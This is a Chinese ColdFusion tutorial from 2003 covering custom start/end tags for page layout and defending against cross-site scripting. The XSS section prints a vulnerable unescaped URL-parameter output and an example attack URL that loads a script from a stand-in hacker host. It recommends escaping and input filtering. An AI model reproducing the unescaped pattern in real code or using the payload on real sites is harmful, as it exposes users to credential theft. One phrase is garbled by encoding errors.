<!--- 在每个页面设定 rootdir 变量值 --->
<cfset rootdir ="../">
<!--- 在被引入的页面中参照 rootdir 变量的值（只要确定这个变量确实有被定义即可，否则在引入档案的时候会出现错误讯息） --->
<a href="#rootdir#news/newspage.cfm"></code>

使用自订卷标来设定版面配置

作者: kyle 2/16/03

内容:

使用自订卷标来设定版面配置
coldfusion 的自订卷标功能让你能够将任何你想象得到的功能封装成一个简单易用的包装。虽然这项功能早在几年前便是 coldfusion 服务器的功能之一，但是从 4.0 版本开始，你可以在自订卷标里面使用启始与结尾卷标。为了说明如何使用自订启始与结尾卷标，在下面这个范例里面我们将网页内容包装在一个自订卷标里面，并且提供版面配置与格式化的相关功能。

想想看，如果在某个普通页面里头可以使用下面这样的写法，那不是很棒吗！

<cf_formatpage title="my page title">
这里是你的页面主要区域的内容。请注意我们在这里并没有加入表格或者 <body> 卷标之类的东西。

</cf_formatpage>

整个页面原始码就是这样了。其它所有版面配置与格式化信息都被隐藏在主要内容外面的自订卷标里面。为了能够在你的自订卷标里面使用启始与结尾卷标，你必须先了解自订卷标的两种使用状态。你可以透过 #thistag.executionmode# 这个变量的值来判断目前被使用的是启始或者是结尾卷标。基本上你的自订卷标内容会被执行两次：一次是遇到启始卷标的时候，另一次便是遇到结尾卷标的时候。为了不让这篇文章显得过于冗长，在这里我们并不加入太多格式化的相关程序代码，但是下面这个基本的 cf_formatpage 自订卷标应该足够让你了解我们刚才提到的观念：

<!--- 以下是 cf_formatpage 自订卷标档案内容 --->
<!--- 如果执行模式是「start」，表示我们遇到的是启始卷标，因此我们显示页面格式的前半段 --->
<cfif thistag.executionmode is "start">

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">

<html>
<head>
<title><cfoutput>#attributes.title#</cfoutput></title>
</head>

<body>

上面这段内容可以包含页面标题图片，选单或者其它内容。

<!--- 被包含在这个卷标里面的其它内容则会接着在这里显示 --->

<!--- 如果执行模式是「end」，表示我们遇到了结尾卷标，因此我们显示页面格式的后半段 --->
<cfelseif thistag.executionmode is "end">

<br><br>这里是页面的页尾区域，在这里你可能会放入内容连结或者版权宣告文字。

</body>
</html>

</cfif>

你能做的东西当然比这个简单例子多得更多，例如加入动态选单，针对每个页面加入不同的标题图片等等。或者换一种作法，你可以针对不同状况建立不同的自订卷标来把版面配置封装起来，只要能够符合你自己的特定需求就行了。

保护页面不受跨网站（cross-site）程序攻击
作者: kyle 2/16/03

内容:

保护页面不受跨网站（cross-site）程序攻击
跨网站程序攻击是网站管理人员经常必须面对的安全性问题之一。像是 asp，cfml 或者 php 这类的应用程序服务器，由于它们与生俱来的动态功能特性，使得它们特别容易受到这一类的攻击。很多时候你的程序都会把某些信息从某个页面传送到另一个页面，将资料储存到数据库中，或者将窗体或 url 参数接收到的变量值显示在页面上。虽然能够在不同页面之间传递资料看起来是一个优点，但是如果你不够小心的话，这项特性也会同时带来严重的安全性问题。举例来说，请看看下面这个超链接以及相对应的目标页面显示的结果：

<!--- 下面是你某个页面中的超链接 --->
<a href="nextpage.cfm?username=brian">请按这里</a>
<!--- 下面是 nextpage.cfm 所显示的内容 --->
<cfoutput>
欢迎来到下一页，#url.username#。
</cfoutput>

看起来够简单了吧？上面这个超级链接纯粹把使用者名称从一个页面传递到另一个页面去（nextpage.cfm），如果你不够小心的话，这正是问题可能发生的地方。跨网站程序（cross-site scripting）基本上便是欺骗你的 web 服务器，让它在未预期的的情况下执行其它网站上面某绦颍?/span>javascript，java applet 或者 activex 控件。

如果你观察上面这个例子的目标页面的 url，它看起来会是下面这样：

http://www.mysite.com/nextpage.cfm?username=brian
某位不怀好意的使用者可以自己输入一个 url，里面包含一个连向另一部服务器上面的程序的连结，就像下面这样：

http://www.mysite.com/nextpage.cfm?username=<script src="http://www.hackersite.com/nastyscript.js">
当 coldfusion 在下一个页面输出上面的 url 所传过来的变量的时候，输出结果看起来变成下面这样：

欢迎来到下一页，<script src="http://www.hackersite.com/nastyscript.js">。
这个变量会让你那无辜的页面在你未预期的状况下执行对方指定的 javascript 程序代码。利用类似的方式，对方也可以在 url 里面指定恶意的 activex 控件或者 javaapplet。当然，在这个例子里面，使用者仅是在浏览器上面执行他们自己指定的程序而已，但如果这些恶意程序代码被你自己的程序不小心储存起来并且之后又输出到其它使用者的画面上（例如捣乱者将某些 javascript 程序代码输入在你的讨论区发表文章窗体里面，然后你的程序在不知情的状况下把这些程序代码当成发言内容的一部份存入数据库中，那么其它使用者观看到这篇文章的时候，那些被刻意放入的 javascript，java applet 或者 activex 控件便会在其它使用者的浏览器上面执行了），这时候那些程序就可能足以将其它使用者的帐号，密码或者其它敏感资料暗中传送到某个地方去。这项安全性问题并非 coldfusion 才会发生的状况，任何应用程序服务器，只要它能够接收从 url 或者窗体传送过来的资料并且显示在使用者画面上，都有可能受到这类攻击。

幸运的是，要避免这种状况发生并不困难。你要做的工作是过滤来自 url 或者窗体传送过来的资料，并且将一些特殊的危险字符，例如 < 或者 >（大于和小于符号），把他们替换成相对应的 ascii 字符码形式（例如将 < 替换成 &lt;）就可以了。事实上 allaire 公司提供了一个 cf_inputfilter 自订卷标，你可以将它用在你的 application.cfm 档案里面，它可以替你处理相关的特殊字符过滤工作。如果你需要更完整的关于这项议题的资料，请参考「allaire 安全问题布告栏」网站上面的这篇文章（asb00-05）。